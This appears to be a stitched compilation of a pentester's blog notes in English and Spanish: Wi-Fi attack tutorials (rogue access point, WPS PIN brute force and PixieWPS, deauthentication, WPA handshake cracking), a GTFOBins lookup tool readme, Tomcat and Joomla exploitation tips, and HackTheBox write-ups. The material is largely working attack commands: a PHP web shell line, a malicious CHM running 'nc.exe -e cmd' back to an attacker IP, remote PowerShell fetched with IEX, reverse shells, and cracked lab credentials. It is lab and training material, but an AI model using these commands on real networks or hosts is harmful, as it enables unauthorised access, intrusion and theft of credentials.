This could take the form of an AP plugged into a network without the administrator’s knowledge. It could also take the form of a maliciously-controlled AP that mimics an existing, approved AP.

Basics

When a client connects to a wireless network, the device will save the network into a list called the Preferred Network List (PNL). A PNL allows devices to reconnect to a familiar network when it is detected again. We will take advantage of this by advertising the same ESSID as an existing AP. If our rogue AP broadcasts a strong signal for the client, the client may attempt to connect to us instead of the existing AP. Even though we might not have the same pre-shared key (PSK) as the AP the client was expecting, we will be able to capture the first two messages of the 4-way handshake. This should give us just the right amount of information to crack the PSK.

There is an additional layer of complexity to this approach. Devices are increasingly sophisticated about which networks to connect to and may save the encryption details in the PNL when the network is saved. This means for a successful attack, our rogue AP will have to match the encryption details of the target.

Harvesting information

We will use airodump-ng to gather information about our target.

sudo airodump-ng -w discovery --output-format pcap wlan0mon

Based on this information, we can deduce that the Mostar network is most likely 802.11n. When we create our rogue AP, we should match these settings as closely as possible to ensure that clients automatically connect to our rogue AP based on their Preferred Network List.

We shouldn’t solely trust the output of airodump-ng since it only shows the highest encryption possible. If the Mostar target network also supports WPA1, that information will not be displayed in the table.

Analysing output

To get more information, let’s open the output Pcap in Wireshark by running wireshark discovery-01.cap. To filter the packet we need, we will use the filter wlan.fc.type_subtype == 0x08 && wlan.ssid == "<ssid>" and analyse the beacon frames.

Extracted info

It can have multiple encryptation methods, exaple:

Creating rogue AP

We will use the hostapd-mana linux packet (found in apt and in AUR).

Building the hostapd-mana Configuration

The configuration file for hostapd-mana has many parameters that can be configured, but we won’t need most of them for this module. The developers have provided an example hostap.conf file. We could examine it and discover which configuration items we need to set.

Insted we will build a simple configuration file with the most relevant parameters.

The interface parameter will configure hostapd-mana to use the wlan0 interface. Next, the SSID is set to “MOVISTAR_FBD8” with the ssid parameter. Finally, we set the channel to “1” to match the target access point.

By default, hostapd-mana will run in 802.11b. In order to meet our target’s settings, we need to change this to IEEE 802.11n. To accomplish this, we set the ieee80211n parameter to “1” in order to enable 802.11n. Next, we need to specify the band to 2.4 GHz by setting the hw_mode parameter to the letter “g”. If the network was running on 5 GHz, we would set hw_mode to “a”.

Next, we can move on to the encryption and authentication settings. These will be important for us to configure in a way that mimics the target AP. First, we will set the wpa parameter to the integer “3” to enable both WPA and WPA2 (setting this parameter to “1” enables only WPA and setting the value to “2” enables only WPA2).

We need to set the authentication to PSK and set the key as well. We can enable PSK authentication by setting the wpa_key_mgmt parameter to “WPA-PSK”. To set the key, we’ll use the wpa_passphrase parameter. The value we set the wpa_passphrase parameter to is irrelevant, since we are only attempting to capture a handshake.

Next, to enable TKIP/CCMP encryption with WPA1, we set wpa_pairwise to “TKIP CCMP”. Finally, we set the rsn_pairwise to “TKIP CCMP” as well in order to enable TKIP/CCMP with WPA2 encryption. If the target was using exclusively WPA or WPA2, we would only set wpa_pairwise or rsn_pairwise. The cipher suite for multicast traffic is automatically set by hostapd-mana and we don’t need to make any changes in the configuration for it.

The only configuration that we need to be concerned about is mana_wpaout, which will specify where to save the captured handshakes (in a Hashcat hccapx format). Each handshake that is captured will be appended to this file. We’ll save our captured handshakes to the file named /tmp/FBD8.hccapx

At this point the config file will look somthing like this:

Capturing Handshakes

sudo hostapd-mana FBD8-mana.conf # APT version
sudo hostapd FBD8-mana.conf # AUR version

If a client connects to the AP we will capture the handshake to the hccapx file, if already connected deviced do not reconnect to the new one, we can perform an deathentication attack but we will need another wireless interface.

Deauthentication attack

To deauthenticate clients, we first connect a new wireless card and start monitor mode on channel 1 by using airmon-ng. The channel should be set to “1” to match that of our target AP. This is all accomplished by running sudo airmon-ng start wlan1 1. Next, we can use aireplay-ng to run a deauthentication attack (-0), continuously (0), against all clients connected to our target AP (-a <bssid>).

aireplay-ng -0 0 -a E6:B4:E6:5C:FB:E6 wlan1mon

Cracking

The captured handshakes are written to a hccapx file. This format is primarily meant to be used with Hashcat, but we can also crack it with aircrack-ng.

aircrack-ng FBD8.hccapx -w /usr/share/wordlists/rockyou.txt

Some WPS implementations are flawed, and a successful attack on an AP with WPS leads to disclosure of the passphrase, no matter how complex it is.

These attacks only work on some APs that advertise WPS in the beacons. APs that do not advertise WPS aren’t vulnerable to any of these attacks.

In this post we will see how to attack an WPS via manual tools, without using wifite or similar tools, this automated tools are realy good but sometimes they report false negatives, and there is no better way to check if something is vulnerable rather than testing it manually.

Technology

Two roles

The most common scenario is the AP to be the registrar and the client to be the enrolle but this is not always the case.

• Enrolee: device looking to join the network
• Registrar: configures enrollees to join the network

Methods For Setup

• Pushing a button
• Inputting a PIN on a device
• Using NFC
• Using a USB flash drive

The last two are deprecated and uncommon.

Pushing a button

When WPS setup happens with a button push, it can either be a physical button on the AP or a virtual button in a management web interface.

PIN code

When setting up with a PIN code, two scenarios are possible.

In the first scenario, the PIN is on the AP, either on a sticker or available through the web interface, and the pin has to be entered by the client wanting to join the network. This might sound confusing, but in this case the AP is the enrollee, and the client device is an external registrar.

In the second scenario, the PIN is on the client device, and has to be entered in the AP interface, when available. In this case, the client is the enrollee, and the AP is the registrar.

After setup

The WPS process securely transmits the WPA or WPA2 passphrase over wireless using EAP messages. The client first starts probing the AP. This is followed by authentication and association, where WPS is indicated in one of the IE of the association frame.

It begins with an EAP Start message. An EAP request identity from the other party follows. That is answered with an EAP response identity with WFA-SimpleConfig-Enrollee-1-0 indicating the device wants to do a WPS exchange. The AP then sends a WSC start to indicate we’re going to start the process.

These are followed by eight EAP request/response messages back and forth, named M1 to M8. These messages are used to securely exchange the encryption key, and if a PIN is involved, verify it is correct. Afterward, it usually sends a WSC_DONE message, and an EAP failure message.

The device disconnects using disassociation or deauthentication, then reconnects normally using the credentials it just received.

WPS Vulnerabilities

Bruteforce (reaver / bully)

The main WPS vulnerability exploits the external registrar scenario, where the AP has a WPS PIN.

WPS PINs are typically eight digits long. The last digit is a checksum, which leaves ten million possible PINs. Checking a PIN usually takes between one and three seconds. Brute forcing would take three to four months at best, making it almost pointless; however, we can alter our brute force attack and make it a little more efficient because of how the PIN is verified.

PIN verification is done in two parts. The WPS exchange validates the first half of the PIN, which, if brute forced, would account for only ten thousand possibilities at most. Once the first half is valid, the system verifies the second half. Since the last digit is a checksum, there are only three digits left to verify, and the second half is now one thousand possibilities at most.

The first half of the PIN is verified using messages M1 to M4. If we receive M5, it is correct. If the second half is correct, we receive M7, along with the configuration.

PixieWPS (reaver fork)

The PixieWPS attack, disclosed in 2014, takes advantage of the weak random number generator used in a few chipsets, which means not all WPS implementations are vulnerable. As opposed to the brute force technique, this technique requires minimal interaction with the AP to gather the data needed for the attack, which is then brute forced offline. The current version of reaver, which has been forked from the original and subsequently improved on, integrates the PixieWPS attack.**

Phisical Attack (ninja skills)

Finally, note that many APs have a sticker on the bottom that may include valuable information like MAC addresses, serial numbers, and, in some cases, a default WPS PIN or even the passphrase. Because administrators leave the default settings in place, sometimes all it takes to find the passphrase is to physically pick up the AP and turn it over.

WPS Attack

Monitor mode

As always we will need to set our wifi interface into monitor mode.

airmon-ng check kill
airmon-ng start wlan0

Check WPS

To check if it is WPS on the target AP we will use a tool called wash with the “-i” parameter

wash -i wlan0mon

Each row represents an AP with WPS. The first column is the BSSID, and the second one is the channel, followed by the signal level reported by the card. The WPS column represents the WPS version. Version 2 mandated mitigations to prevent brute forcing, which, depending on the implementation, may just slow down a bruteforce attack. The Lck indicates if WPS is locked, meaning an attack is pointless at this time. The Vendor column indicates the wireless chipset vendor, which is sometimes advertised in the beacon. The last column is the ESSID of the AP.

Wash scans the 2.4GHz band by default. To make it scan 5GHz, we can append the ”-5” option to the command. Alternatively, we can use airodump-ng to display WPS information using ”–wps”.

Reaver bruteforce attack

We will now use reaver to attack our wifi AP. We have to specify the BSSID of the AP we gathered earlier using wash with -b, the wireless interface using -i, and a very verbose output with -vv.

reaver -b A0:0B:BA:F0:9F:B2 -i wlan0mon -vv

Note that some drivers have trouble with reaver and won’t switch channels to find the AP. This is the case when the output of reaver is stuck at “Waiting for beacon from XX:XX:XX:XX:XX:XX” for a long time. In this case, we have to add the channel parameter (-c) followed by the channel gathered by wash.

Reaver PixieWPS attack

The method described here will take a long time, and even longer in the event the AP has countermeasures. Earlier, we described the PixieWPS attack. When successful, it will give us results much more quickly. To try it, we will add an additional option to the reaver command, and use -K.

reaver -b A0:0B:BA:F0:9F:B2 -i wlan0mon -vv -K

One alternative to this method is to use bully with -d, which will attempt to run PixieWPS with the values we recovered from bully. We would also need to specify verbosity to display these values, with -v 4. The output can be a bit confusing, but the data for PixieWPS starts with the display of the Enonce and ends with the output of E-Hash2.

PixieWPS should work when provided with only the required parameters. Sometimes we also need to provide the -m option as well. Once the PIN is recovered, we can provide it to bully to do a single PIN try, using -B -p followed by the PIN, to recover the passphrase.

Variations

WPS implementation vary from a vendor to another, which is why reaver and bully have so many options. A few APs, however, do not have a PIN (it is left blank). Both reaver and bully can verify a single pin, and in order to use an empty PIN, we will use -p ‘’.

Some other implementations have default PIN values that depend on the first three bytes of the BSSID. One project, airgeddon, has compiled a list of these in the file known_pins.db.

As a quick example, let’s use this file to check if our particular AP has default pins. We can install the airgeddon package with apt.

We’ll use source to execute a shell script, known_pins.db, which loads an array of PINs into memory. Finally, we’ll check the database for an AP whose BSSID starts with “0013F7”. It is case sensitive and the first three bytes must be uppercase.

sudo apt install airgeddon
source /usr/share/airgeddon/known_pins.db
echo ${PINDB["0013F7"]}
#Output: 14755989 48703970 06017637

The command returns three PINs in this example, which are shown separated by a space character. If there was no match, the output would have been empty. We can manually test each one of these PINs with reaver or bully.

Troubleshooting

Attack Choice

The PixieWPS attack is preferable to brute forcing whenever possible, but it’s important to remember that not all chipset random number generators are vulnerable. We will often have to resort to brute force the PIN.

Brute forcing may sometimes be met with countermeasures from the AP. Since implementations vary, we can sometimes work around the countermeasures using the timing options in reaver.

WPS Transaction Failure

Sometimes, after finding the PIN with PixieWPS, we receive the following from reaver.

[!] WPS transaction failed (code: 0x03), re-trying last pin

It could be just a temporary failure, in which case we would need to restart reaver without the PixieWPS option. When we restart, reaver will prompt to restore previous session, which has the correct PIN. If we continue to receive this error, we will need to try another wireless card.

ACK Issues

Reaver seems to have issues with certain chipsets that do not behave the way it expects. For example, reaver might keep trying the same PIN when verbose mode (using -vv) is set. When increasing verbosity with -vv, we might notice a dozen instances of the following pair of messages.

[+] Sending identity response
[+] Received identity request

This is caused by the wireless card not acknowledging frames sent by the AP, which makes the AP re-transmit them a few times before giving up and trying again.

We might also recognize this in a packet capture when reaver does the authentication and association.

The easiest solution to this is to try a different wireless card with a different chipset.

WPS Lock

When WPS is locked, we can do a denial of service on the access point using mdk3 or its successor, mdk4. In some cases, this will trigger a reboot of the AP, which releases the lock.

We can use authentication DoS, EAPOL Start DoS, or the EAPOL Logoff flood attack. We may need multiple wireless cards to carry out the attack, overflow the AP, and make it crash so that it reboots.

Installation

The Arch Linux version (GTFOBins-Explorer-ng file) depends on mdcat, wich is automaticaly installed with paru, if you want to use this version, search how to install mdcat in your distro. If not you can just use the normal version and follow the steps described below.

Arch Linux

I have uploaded it to the AUR repo so you just need to:

paru -S gtfobins-explorer-git

It will create an executable in /usr/bin/gtfobins

Other Distros

It is important to install html2text with pip2/python2.

git clone https://github.com/creep33/GTFOBins-Explorer.git
cd GTFOBins-Explorer
sudo python2 -m pip install html2text
sudo mv GTFOBins-Explorer /usr/bin/gtfobins

Usage

Single binary search

gtfobins <binary>

It will display the multiple options for the binary specified (If there are).

gtfobins <binary> "<option>"

It will display the exact text as if you have searched it in the official GTFOBins website.

Example (arch/ng version)

For the example we will use awk binary.

For some reason we are not focusing on why, we will display the “File Read” option.

And now if we compare it with the official page we will see it is the same.

Multiple search

We can input a file which must be the output of the find / \-perm -4000 2>/dev/null

gtfobins -f file

Or if you don’t want to create the file you can just:

find / \-perm -4000 2>/dev/null | gtfobins -f -

And it will search all the binaries in GTFOBins Website.

Set interface to monitor mode

airmon-ng check kill
airmon-ng start wlan0

Choose a target

airodump-ng wlan0mon

We will choose a target who has PSK auth method, and we will store the chanel, the bssid the essid and a client bssid.

Example target:

• ESSID: wifu
• BSSID: 34:08:04:09:3D:38
• Channel: 3
• Client BSSID: 00:18:4D:1D:A8:1F

Prepare our capture scenario.

airodump-ng -c 3 --essid wifu --bssid 34:08:04:09:3D:38 -w wpa wlan0mon

We will store the capture into “wpa.*” files.

Deathenticate a client

aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon

Troubleshooting

• Some wireless drivers ignore directed deauthentication and only respond to broadcast deauthentication. We can run the same aireplay-ng deauthentication command without the -c parameter.

Cracking Hash

Once the client reconnects with the target AP, airodump-ng will be able to capture a handshake.

Before terminating airodump-ng with <ctrl>+c, let’s continue to capture traffic between the client and the AP. This additional data will assist us in confirming the key is correct later on.

aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap

Troubleshooting

• If 802.11w is in use, unencrypted deauthentication frames are ignored. The only course of action is to wait for a client to connect.
• The device simply didn’t reconnect or was already out of range of the AP.

Verifying its validity

Aircrack-ng successfully cracked our easy passphrase. However, we should confirm it is correct. It is possible that we captured a client’s unsuccessful attempt to connect to the network. This is where we make use of the additional traffic we captured between the client and the AP.

airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap

(Obviously the -p parameter if for the cracked passphrase)

Our results show airdecap-ng successfully decrypted 37 packets. In some cases, where there is a pause in decryptable traffic, airdecap-ng may indicate “0” even if the passphrase is correct.

Troubleshooting

• Another way we can confirm our passphrase is to use Wireshark and add it to a capture as described in the Wireshark module.

• Another option is to capture another handshake with airodump-ng and capture more follow-on traffic. We may be able to just capture traffic between the same client and AP, then combine both capture files if little time has elapsed. Rekeying can happen up to an hour after initial handshake.

Custom wordlists to crack

Search for router default patterns

It is rare to know an AP’s model prior to an engagement, but we can determine some information about the device’s manufacturer from its IEEE Organizationally Unique Identifier (OUI). To do this, we’ll look in the first three bytes of the BSSID.

Expand wordlists

In addition to all of this, there are many tools that can mangle and expand our wordlists. We will focus on three popular ones.

• John the Ripper, also known as John or abbreviated as JtR
• Crunch
• RSMangler

While all of these tools will mangle words, Crunch is a bit different because it is mostly used to create wordlists from scratch. The capabilities of these tools also overlap, and two tools often can achieve the same result. It’s likely that the tool we choose will depend on personal preference.

Pipe John rules to aircrack-ng

john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - wpa-02.cap

Aircrack-ng with CRUNCH

Crunch usage

Given a pattern and a character set or words, Crunch is able to generate all possible combinations.

crunch 8 9 abc123

(Because it is 58TB long, we short the output just with the characters “abc123”)

crunch 11 11 -t Password%%%

(Generate an 11 lenght password + 3 numbers dictionary)

crunch 1 1 -p dog cat house 

(Generate an all combinations of theese words wordlist)

crunch 5 5 -t ddd%% -p dog cat bird

(Generate an all combinations of theese words wordlist and add 2 numbers)

Pipe wordlists to aircrack

crunch 11 11 -t Password%% | aircrack-ng -e wifu wpa-02.cap -w - 

Aircrack-ng with RSMangler

rsmangler --file wordlist.txt --min 12 --max 13 | aircrack-ng -e wifu wpa-03.cap -w - 

Cracking hash with Hashcat

We need to transform the cap file int o a hccapx.

apt install hashcat-utils
cap2hccapx wifu-01.cap output.hccapx
hashcat -m 2500 output.hccapx /usr/share/john/password.lst

Airolib-ng (RT)

Airolib-ng is a tool designed to store and manage ESSID and password lists, compute their Pairwise Master Keys (PMK), and use them in order to crack WPA and WPA2 PSK passphrases. It uses the lightweight SQLite3 database as its storage mechanism, which is available on most platforms. (Rainbow tables)

File with the ESSID

echo wifu > essid.txt

Importing ESSID into airolib-ng db

airolib-ng wifu.sqlite --import essid essid.txt

Displaying stored info

airolib-ng wifu.sqlite --stats

Import passwords dict

airolib-ng wifu.sqlite --import passwd /usr/share/john/password.lst

Compute

airolib-ng wifu.sqlite --batch

Displaying stored info

airolib-ng wifu.sqlite --stats

Cracking with a DB in aircrack-ng

aircrack-ng -r wifu.sqlite wpa1-01.cap

coWPAtty (RT)

Generating the Rainbow Table

genpmk -f /usr/share/john/password.lst -s wifu -d wifuhashes 

(Where wifu is the ESSID, and wifuhashes the outputfile)

Cracking with cowpatty

cowpatty -r wpajohn-01.cap -s wifu -d wifuhashes

Apache Tomcat funciona como un contenedor de servlets desarrollado bajo el proyecto Jakarta en la Apache Software Foundation. Tomcat implementa las especificaciones de los servlets y de JavaServer Pages de Oracle Corporation.

Explotación

Web

/manger/html -> Ruta de administración

Credenciales por defecto:

USER: tomcat

PASS: tomcat

Path vuln

Si la ruta /manager/html está bloqueada, se puede tratar de acceder a esta mediante:

/lalala/..;/manager/html

O mediante un parámetro:

/;param=value/manager/html

Archivos Relevantes

/usr/share/tomcat*/conf/tomcat-users.xml -> Archivo con credenciales hardcodeadas

Escrito el 07-01-2022 a las 09:11 pm por creep33.

Joomla! es un sistema de gestión de contenidos que permite desarrollar sitios web dinámicos e interactivos. Permite crear, modificar o eliminar contenido de un sitio web de manera sencilla a través de un “panel de administración”.

Explotación

Una vez hemos iniciado con credenciales válidas y con capacidad de editar. Nos dirigimos a: Extensions > Templates > Templates > Protostar Details and Files > index.php.

Y añadimos la línea:

echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";

IP -> 10.10.10.151

Reconocimiento

Nmap

Utilizamos nmap y obtenemos los siguientes resultados.

Sniper Nmap Result

Crackmapexec

Usamos Crackmapexec para enumerar información del Active Directory y añadimos el dominio al /etc/hosts

OS: Windows 10 Dominio: Sniper Signing: False SMBv1: False

smbclient y smbhost

Listamos servicios mediante un [null session](/SMB/ Pero necesitamos credenciales.

http

En la misma página, encontramos los directorios:

/blog/index.php -> Podemos utilizar distintos idiomas. -> Cada idioma tiene un archivo asociado. /user/login.php -> Panel de inicio de sesión -> Probamos credenciales por defecto

• Probamos un path traversal, en el parámetro lang.

Tenemos LFI

• Probamos a convertirlo en un remote file inclusion.

Pero no funciona

• Probamos a cargar un archivo smb para tratar de crackear el hash.

Es vulnerable a RFI por SMB. Pero no vemos ningún hash.

• Tenemos que crear un recurso compartido con smbd linux.

service smbd start
net usershare add smbFolder $(pwd) '' 'Everyone:F' 'guest_ok=y'

• Creamos un archivo txt a modo de prueba

Triggeamos el RFI y funciona.

• Cargamos una webShell por php

webShell

Nos enviamos una reverse shell cmd con nc.exe.

User Pivoting (Chris)

OS

whoami /priv

SeImpersonatePrivilege -> Podríamos utilizar [[Juicy Potato]] pero vamos a explotar la máquina de la forma intencionada.

cd C:\inetpub\wwwroot
dir
cd user
dir
net user
net user Chris

db.php -> Credentials Chris está en el “Remote Management Users” -> winrm

Probamos las credenciales para el usuario “Chris”. Son válidas. Pero no tenemos PWNED El winrm no está expuesto hacia fuera, hacemos port forwarding con Chisel del puerto 5985.

Nos conectamos con [winrm a localhost con las credenciales de “Chris” [ ! ] AppLockerBypass puede ser necesario.

PrivEsc

type C:\Users\Chris\desktop\user.txt
whoami /priv
cd C:\
dir
cd Docs
dir
type note.txt
cd C:\Users\Chris
dir
cd Downloads
dir

user.txt

note.txt -> En la nota vemos que tenemos que dejar la documentación de una nueva app en la carpeta C:\Docs instructions.chm -> Este tipo de archivos son archivos de ayuda

Sospechamos que el tipo de archivo que tenemos que crear es un .chm Buscamos por “create malicious chm file”. Para crearlo necesitamos hacerlo en una máquina windows de atacante.

• Descargamos HTML Help Workshop porque la herramienta lo requiere.
• Utilizamos la herramienta de “nishang” Out-CHM.ps1
• Nos sincronizamos al recurso y creamos el archivo malicioso.

IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1')
Out-CHM "C:\Users\Chris\Desktop\nc.exe -e cmd 10.10.14.13 443" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

• Movemos el archivo malicioso a la máquina víctima a la ruta C:\Docs y nos ponemos en escucha con netcat.

root.txt

Escrito el 29-12-2021 a las 01:41 am por creep33.

IP -> 10.10.10.29

Reconocimiento

Nmap

Utilizamos nmap y obtenemos los siguientes resultados.

Bank Nmap Result

http

whatweb

Utilizamos whatweb para extraer informacion pero no obtenemos ninguna información relevante.

Virtual Hosting

Probamos a ver si se está realizando virtual hosting. Con el dominio “bank.htb”.

Añadimos en dominio “bank.htb” al /etc/hosts

bank.htb

Vemos un panel de inicio de sesión. Probamos credenciales por defecto pero no conseguimos nada.

Fuzzing

Fuzzeamos el servicio http con herramientas como wfuzz o gobuster. Y obtenemos los siguientes resultados.

/uploads -> 403 /assets -> Unrelevant directories /inc -> 4 php scripts /balance-transfer -> Lots of .acc files.

Vamos a filtrar para ver si hay algun fichero que pese un valor que se sale de la media en /balance-transfer

curl -s -X GET "http://bank.htb/balance-transfer" | grep -oP '[a-z0-9]{32}\.acc.*"right".+\s' | awk '{print $1 "->" $7}' FS=">" | tr -d '"' | sort -k3 -n

68576f20e9732f1b2edc4df5b8533230.acc-> 257 USER: cris\@bank.htb PASS: !##HTBB4nkP4ssw0rd!##

Iniciamos sesión en el panel de inicio de sesión.

Panel de “Support”

Nos permiten subir un archivo al reportar un ticket. Probamos a hacre un ticket de prueba. Y nos reporta que solo podemos subir imágenes. Al subir una imágen vemos que el directorio /uploads es donde se almacenan las imágenes.

• Tratamos de subir un archivo php ya que la página funciona con php.

Pero nos reporta que tenemos que subir imágenes.

Burpsuite

Utilizaremos Burpsuite para analizar como se tramite la data. Al realizar la petición vemos que en la respuesta, hay un comentario que dice que los archivos .htb lo interpreta con php.

• Subimos un script en php con extensión htb

WebShell

Nos enviamos una reverse shell.

Domain

Probamos un ataque de transferencia de zona con la herramienta dig sobre el dominio “bank.htb” ya que es un convenio de HTB.

DNS: chris.bank.htb -> No vemos nada nuevo

PrivEsc

OS

whoami
hostname -I
cd /home
ls
cd chris
ls
cat user.txt

user.txt

cd /
find \-perm -4000 2>/dev/null

./var/htb/bin/emergency -> Binario compilado de 32 bits SUID

/var/htb/bin/emergency

Lo ejecutamos y somos root

cd /root
cat root.txt

root.txt

Alt-way

Otra forma de escalar privilegios sería modificar el archvo /etc/passwd ya que “otros” pueden editar el archivo para incrustarle una contraseña a root. Ex:

• Ghoul

Escrito el 28-12-2021 a las 05:47 pm por creep33.

IP -> 10.10.10.157

Reconocimiento

Nmap

Utilizamos nmap y obtenemos los siguientes resultados.

Wall Nmap Result

http

whatweb

Utilizamos la herramienta whatweb para enumerar información del servicio http. Pero no obtenemos información relevante.

http-enum

Mediante el script http-enum fuzzeamos el servicio web.

Fuzzing

Fuzzeamos el servicio http con herramientas como wfuzz o gobuster. Y obtenemos los siguientes resultados.

monitoring -> 401 -> Probamos credenciales por defecto.

Pero no conseguimos nada.

curl

• Cambiamos tipo de petición a POST

curl -s -X POST "http://10.10.10.157/monitoring -L

Descubrimos una ruta nueva

/centreon

Browser

Panel de inicio de sesión. “Centreon”. Buscamos “Centreon default password” pero las credenciales que encontramos no sirven. Podemos buscar a ver si tiene una API, para realizar pruebas. Encontramos una api

/centreon/api/index.php

Realizamos un ataque de fuerza bruta sobre la api con wfuzz

wfuzz bruteforce

wfuzz -c -t 200 --hc=404 --hh=17 -w /usr/share/seclists/darkweb2017-top10000.txt -d 'username=admin&password=FUZZ' "http://10.10.10.157/centreon/api/index.php?action=authenticate"

USER:: admin PASS: password1

Browser

Iniciamos sesión con las credenciales válidas en /centreon

Vamos al panel de about para ver que vesión es.

Version: 19.04

Con searchsploit vemos que tiene una vulnerabilidad de RCE.

Exploitation

python centreon.py 'http://10.10.10.157/centreon' admin password1 10.10.14.13 443 2>/dev/null

Nos ponemos en escucha con nc.

nc -nlvp 443

Pero en un primer momento no funciona.

• Analizamos el script.

Vemos una ruta, en la que crea un “poller” y la inyección la realiza en el campo “nagios_bin”. Que es el campo “Monitoring Engine Binary”.

• Realizamos el proceso manualmente.

Nos devuelve un 403 Forbidden. Puede que halla un WAF.

• Modificamos el script para que funcione como un RCE, cada uso.
• Probamos diferentes payloads, y nos damos cuenta que el ‘ ‘ no le gusta.

[ ! ] En bash el ‘ ‘ también se puede poner como ‘${IFS}’

• Nos funciona.
• Nos enviamos una reverse shell “sin usar espacios” (con un index.html y jugando con pipes y curl)

Recibimos el GET pero no la reverse shell

• Dividimos el comando en 2, primero descargando el archivo a una ruta y después ejecutándolo con bash.

Tenemos reverse shell.

PrivEsc

OS

cd /home
ls
cd shelby
ls
cat user.txt

No podemos leer el user.txt Vemos un html.zip

Vamos a traernos el html.zip para analizarlo en nuestra máquina.

7z x html.zip
cd html
grep -r -i "pass"

Pero no encontramos nada.

• Seguimos analizando la máquina víctima.

id
cd / 
find \-perm -4000 2>/dev/null

screen-4.5.0 es SUID, y es vulnerable a privilege escalation.

Con searchploit descargamos es script en bash, lo subimos a la máquina víctima ya que cuenta con gcc. Lo ejecutamos y somos root.

cat /home/shelby/user.txt
cat /root/root.txt

user.txt root.txt

Escrito el 28-12-2021 a las 07:42 pm por creep33.

El Post Office Protocol (POP) es un tipo de red informática y protocolo estándar de Internet que extrae y recupera el correo electrónico de un servidor de correo remoto para su acceso por la máquina host. POP es un protocolo de capa de aplicación en el modelo OSI que proporciona a los usuarios finales la capacidad de obtener y recibir correos electrónicos.

Por defecto opera en los puertos -> 110, 995

Explotación

Para utilizar este servicio podemos trabajar desde consola con netcat. Para ello necesitamos poseer credenciales de acceso válidas.

Autenticación

nc 10.10.10.10 110
USER user
PASS userpass

Commands

• LIST -> Listar correos en la bandeja de entrada.
• RETR <int> -> Mostrar el correo numero <int> de la bandeja de entrada.